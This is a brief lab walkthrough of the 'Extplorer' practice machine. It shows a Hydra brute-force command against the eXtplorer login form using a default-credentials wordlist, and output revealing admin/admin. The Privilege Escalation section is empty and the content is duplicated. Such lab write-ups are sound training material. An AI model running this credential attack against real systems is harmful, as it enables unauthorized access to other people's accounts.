Extplorer

Initial Foothold

┌──(joe㉿kali)-[~/hax/pg/extplorer]
└─$ hydra extplorer.offsec http-post-form "/filemanager/index.php:option=com_extplorer&action=login&type=extplorer&username=^USER^&password=^PASS^&lang=english:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:109.0) Gecko/20100101 Firefox/115.0:H=Accept\: */*:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=X-Requested-With\: XMLHttpRequest:H=Content-Type\: application/x-www-form-urlencoded; charset=UTF-8:H=Origin\: http\://extplorer.offsec:H=Connection\: close:H=Referer\: http\://extplorer.offsec/filemanager/index.php:H=Cookie\: eXtplorer=98HzE7oQRMcARXO6A7ujHFaBc9ep4R0f:Login failed, try again." -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-03 10:53:02
[INFO] Using HTTP Proxy: http://localhost:8080
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking http-post-form://extplorer.offsec:80/filemanager/index.php:option=com_extplorer&action=login&type=extplorer&username=^USER^&password=^PASS^&lang=english:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:109.0) Gecko/20100101 Firefox/115.0:H=Accept\: */*:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=X-Requested-With\: XMLHttpRequest:H=Content-Type\: application/x-www-form-urlencoded; charset=UTF-8:H=Origin\: http\://extplorer.offsec:H=Connection\: close:H=Referer\: http\://extplorer.offsec/filemanager/index.php:H=Cookie\: eXtplorer=98HzE7oQRMcARXO6A7ujHFaBc9ep4R0f:Login failed, try again.
[80][http-post-form] host: extplorer.offsec   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-03 10:53:04

Privilege Escalation

PreviousImage NextBlackgate

Last updated 1 month ago

Initial Foothold

┌──(joe㉿kali)-[~/hax/pg/extplorer]
└─$ hydra extplorer.offsec http-post-form "/filemanager/index.php:option=com_extplorer&action=login&type=extplorer&username=^USER^&password=^PASS^&lang=english:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:109.0) Gecko/20100101 Firefox/115.0:H=Accept\: */*:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=X-Requested-With\: XMLHttpRequest:H=Content-Type\: application/x-www-form-urlencoded; charset=UTF-8:H=Origin\: http\://extplorer.offsec:H=Connection\: close:H=Referer\: http\://extplorer.offsec/filemanager/index.php:H=Cookie\: eXtplorer=98HzE7oQRMcARXO6A7ujHFaBc9ep4R0f:Login failed, try again." -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-03 10:53:02
[INFO] Using HTTP Proxy: http://localhost:8080
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking http-post-form://extplorer.offsec:80/filemanager/index.php:option=com_extplorer&action=login&type=extplorer&username=^USER^&password=^PASS^&lang=english:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:109.0) Gecko/20100101 Firefox/115.0:H=Accept\: */*:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=X-Requested-With\: XMLHttpRequest:H=Content-Type\: application/x-www-form-urlencoded; charset=UTF-8:H=Origin\: http\://extplorer.offsec:H=Connection\: close:H=Referer\: http\://extplorer.offsec/filemanager/index.php:H=Cookie\: eXtplorer=98HzE7oQRMcARXO6A7ujHFaBc9ep4R0f:Login failed, try again.
[80][http-post-form] host: extplorer.offsec   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-03 10:53:04